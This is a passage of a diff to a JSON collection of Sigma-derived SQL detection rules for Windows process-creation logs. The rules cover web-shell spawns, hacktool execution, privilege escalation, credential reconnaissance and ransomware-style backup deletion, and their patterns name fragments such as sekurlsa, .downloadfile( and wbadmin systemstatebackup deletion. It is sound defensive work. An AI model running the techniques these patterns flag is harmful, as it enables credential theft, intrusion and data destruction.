CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE 
'%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "title": "Process Creation Using Sysnative Folder", + "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine 
Bencherchali (Nextron Systems)", + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_susp_sysnative.yml" }, { - "title": "Suspicious ZipExec Execution", - "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "status": "test", - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "title": "System Network Connections Discovery Via Net.EXE", + "id": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "status": "experimental", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "author": "frack113", 
"tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.discovery", + "attack.t1049" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((CommandLine LIKE '% use' ESCAPE '\\' OR CommandLine LIKE '% sessions' ESCAPE '\\') OR (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% sessions %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_zipexec.yml" + "filename": "proc_creation_win_net_network_connections_discovery.yml" }, { - "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "status": "test", - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "author": "Beyu Denis, oscd.community", + "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", + "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "status": "experimental", + "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". 
The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", + "author": "@gott_cyber", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1218", + "attack.t1105" ], "falsepositives": [ - "System administrator Usage" + "Since the content of the files are unknown, false positives are expected" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet.yml" + "filename": "proc_creation_win_ldifde_file_load.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE 
'%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Hidden Powershell in Link File Pattern", - "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", - "status": "test", - "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "title": "DirLister Execution", + "id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "status": "experimental", + "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate commands in .lnk files" + "Legitimate use by users" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'DirLister.exe' OR Image LIKE '%\\\\dirlister.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_embed_exe_lnk.yml" + "filename": "proc_creation_win_dirlister_execution.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine 
LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "Unmount Share Via Net.EXE", - "id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1070.005" + "attack.t1036.003" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%share%' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_share_unmount.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.impact", + "attack.t1490" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" + ], + "falsepositives": [ + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", + "id": "01c42d3c-242d-4655-85b2-34f1739632f7", "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects usage of Dsacls to grant over permissive permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate administrators granting over permissive permissions to users" ], - "level": "high", + "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_dsacls_abuse_permissions.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "description": "Detects usage of wsudo (Windows Sudo Utility). 
Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Esentutl Gather Credentials", - "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "title": "WinDbg/CDB LOLBIN Usage", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "status": "test", - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
